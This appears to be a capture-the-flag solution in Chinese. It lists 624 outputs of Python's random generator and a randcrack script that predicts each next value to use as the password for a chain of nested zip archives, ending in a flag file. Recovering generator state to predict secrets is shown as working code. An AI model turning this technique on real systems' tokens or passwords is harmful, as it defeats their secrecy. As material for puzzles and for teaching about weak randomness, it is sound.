4067727195, 4215992615, 50813272, 
3422137608, 1214655257, 2262352860, 1445338275, 1049642872, 817141685, 3537094077, 1735027729, 4235889837, 2173890300, 4024475021, 435474311, 417920911, 2752551821, 10146419, 1584825302, 2581381951, 4078884446, 2091842886, 2635154217, 1512293963, 4240561542, 2569831040, 3062146866, 2413003376, 2056726083, 137699216, 2817513365, 847863437, 1348716639, 264518910, 1581262871, 3687371459, 4081927416, 3402250258, 1538729417, 58632833, 418582971, 3579226914, 1710281441, 3968026001, 3072229268, 3255655022, 443028273, 1781242768, 845963258, 1474822808, 2287289816, 3140795568, 647767985, 3201933540, 3344108747, 3156561341, 2135178605, 3977772423, 1091627310, 3387469991, 3480076167, 998455889, 3932962822, 556790737, 3462656387, 1354331856, 331339457, 89589652, 2169976628, 499723289, 4248480190, 459434352, 1756143408, 609517004, 1625850533, 1055607475, 4078436277, 178892738, 2639443481, 1643997964, 209795222, 4031695509, 515771499, 3844892252, 1509762710, 3467911440, 2990611802, 4108349538, 1251780874, 1275943948, 2750712131, 457664709, 1234644717, 3894274138, 779659511, 1022790972, 3587520181, 4114414679, 1788862106, 784942685, 2032827515, 97699241, 502970796, 208621053, 618199448, 869691038, 1315708708, 2950393537, 316695424, 3204417376, 2157414925, 1986435697, 578058463, 2226332610, 45889470, 1939749473, 4277520616, 716509244, 3148642698, 2619738742, 395812501, 2611816764, 120484619, 3803132111, 3028743725, 3032307726, 3558459801, 2286359562, 3242070811, 2972037405, 2409275190, 333056311, 1628673919, 1222753699, 3226124314, 510049636, 1798218781, 3286822755, 2050136383, 363266297, 753159469, 1339229922, 3282010884, 3964577747, 1183093495, 3665656653, 1802113568, 586211819, 1906435982, 407943402, 3478960696, 1221962222, 2646386190, 2344832406, 3568499138, 3479343149, 1044214259, 2255694969, 2629616514, 3767094630, 366310899, 2466889679, 2533941943, 2817371332, 478094315, 3077780922, 1917154805, 3668750533, 77295478, 258422916, 3929257613, 3653596300, 749676172, 2250390103, 
1052624843, 2563981631, 519704737, 2969422268, 1628120157, 4100859626, 252141936, 2978131799, 1142247725, 3804721174, 1356078034, 1198864435, 2564872115, 3858385849, 3652532995, 305266060, 482238871, 1451662628, 2189662472, 4225060244, 3266478407, 298473768, 1328477173, 1872099590, 380059855, 912553536, 2099522339, 3224313555, 2056296410, 477848639, 379190417, 3487993484, 3121969521, 2288925162, 3077843604, 1456549673, 1304340342, 2083447579, 3167117719, 3348095325, 2268107766, 1402643313, 2397212057, 1352006746, 231921187, 1313920238, 2168273889, 805130323, 2816803714, 3720840652, 3407591957, 479785258, 1217833088, 4229273758, 587760181, 1233711591, 2930015733, 3697241657, 570349524, 1000281623, 2960131310, 3941057032, 3611068081, 1929535695, 1078174814, 549556557, 2427930182, 1127864687, 3728874623, 1552852683, 246530969, 3129577778, 2828503428, 741919312, 215642980, 1167747156, 1074184265, 1803181867, 1728287989, 3994497806, 3166040995, 4102870506, 2533028438, 1554448227, 1743174913, 2757654175, 1620162669, 2326525927, 1822891531, 3118838616, 988494514, 724274952, 3466926668, 2858066332, 1508595710, 2951666140, 1637995296, 2345022808, 4293996946, 2531108812, 1393641667, 3609374661, 1294467284, 1466747081, 1787125071, 418589219, 2105433503, 2486534005, 1556969350, 4187693157, 2376356641, 2760842106, 3305118691, 2311132184, 2756948087, 3686050208, 1794448609, 2080775564, 2924248445, 2178418677, 4158669833, 3219430073, 967669386, 221829347, 730413000, 4032488141, 861524009, 3520395384, 229287210, 2928013323, 634603946, 2344109932, 2651517581, 2956026520, 3962896689, 752853056, 1576906191, 420644394, 1259665633, 1833948237, 1550770827, 2065923435, 4174111849, 3128201235, 2682226239, 3167161894, 576977612, 2487367426, 2431206872, 3390561516, 2334384070, 3436416734, 2200879126, 3180692685, 2766121590, 1064218408, 410199199, 20022323, 1718513066, 3297953226, 451443686, 2132362103, 257410781, 1541671484, 3761895270, 348365872, 816022713, 4294497492, 2625738817, 
3603223866, 3078033498, 1147648777, 3514932557, 2930781580, 984846570, 4212244974, 1020179629, 3382552365, 3588342390, 2485187463, 2828961807, 4136474278, 3551225472, 4086885006, 1310692642, 2241965503, 1504390196, 1603497325, 1455103646, 366434701, 293869916, 1550592307, 4214651425, 4250886934, 1306227123, 4036718626, 2933260006, 762182112, 1830993485, 2128141366, 44628368, 2873401036, 1257136753, 3380864990, 4275919402, 789867953, 3318150127, 487054724, 3730547753, 1936887664, 171225030, 3722592745, 1340948219, 1016521820, 1447577763, 2805353516, 1417994373, 817439704, 3813079978, 1200757040, 339005780, 4232371651, 1296406800, 805088113, 2812427961, 3875582523, 4113860721, 1947280914, 3775671015, 955163233, 3603928099, 91477649, 3287607536, 4201104916, 2491411596, 460805757, 1332051516, 3368474042, 3164283116, 2874896056, 293562372, 411629539, 2220832875, 2299167075, 2579299726, 2882735860, 2668845063, 42813252, 917639463, 2216449232, 2644803904, 2031826548, 3452099002, 1103665712, 1070395870, 532734790, 4097725963, 581033399, 963298035, 823792656, 3525861586, 20973404, 2359012004, 3432019008, 2233316197, 697890212, 3568807990, 3652343610, 1398136840, 937985297, 2581792527, 2566945713, 1386694986, 2557383413, 1945328836, 1021712351, 3289407095, 2323689998, 3306271310, 3585440682, 1855892766, 2796595085, 2504479613, 1289850575, 2929745242, 2021810381, 3242210155, 3055960700, 365068549, 2513400611, 553638319, 3920510223, 2495696848, 1824819128, 1213008255, 4189990551, 1989970719, 1031033434, 531275736, 882122649, 1721700980, 3178163802, 3700771996, 1850869451, 3206165832, 1272158460, 3303927391, 4119824836, 3968831781, 3771252104, 1674478394, 530327252, 9184370, 2681387057, 1178553319, 1950066334, 3127696976, 2661749414, 1383174577, 4201508029

另存为 data.txt,预测下一个随机数后对 unknown.zip 进行解压,然后把新的密码 append 到数组后面,最新的 624 个数字再预测下一个压缩包的密码:

import randcrack
import zipfile
import os
def predict(data):
    """Return the value randcrack predicts to follow the 624 given outputs.

    *data* must hold exactly 624 values (strings or ints); each one is
    converted with int() and submitted to a fresh RandCrack instance.

    That 624 consecutive outputs are enough to predict the next one is the
    reason Python's `random` module must not be used for passwords or other
    secrets; the `secrets` module is the appropriate source.
    """
    assert len(data) == 624
    cracker = randcrack.RandCrack()
    for value in map(int, data):
        cracker.submit(value)
    return cracker.predict_randrange(0, 4294967295)
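def uncompress(password):
    """Extract unknown.zip into the current directory using *password*.

    The archive is first renamed to temp.zip (replacing any earlier
    temp.zip) so that an inner file called unknown.zip can be extracted
    without colliding with the archive being read.

    Raises FileNotFoundError when unknown.zip does not exist, and whatever
    zipfile raises for a wrong password.
    """
    if os.path.exists("temp.zip"):
        os.remove("temp.zip")
    os.rename("unknown.zip", "temp.zip")
    # Close the archive once extracted: the original kept one handle open per
    # layer, and an open handle can also block the os.remove() above on the
    # next call on platforms that lock open files.
    with zipfile.ZipFile("temp.zip") as archive:
        archive.extractall(pwd=bytes(str(password), encoding='ascii'))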
# Seed the sliding window with the last 624 recorded values.
with open("data.txt") as f:
    data = f.read().split(", ")[-624:]

# Predict the next password, extract the next layer, then slide the window:
# drop the oldest value and add the one just used. The loop has no exit
# condition of its own; it stops when uncompress() raises because no further
# unknown.zip was produced.
while True:
    password = predict(data)
    uncompress(password)
    data = data[-623:] + [password]

解压到最后一层得到文件 flag,代码会因为找不到 unknown.zip 而报错停止,打开文件 flag 即可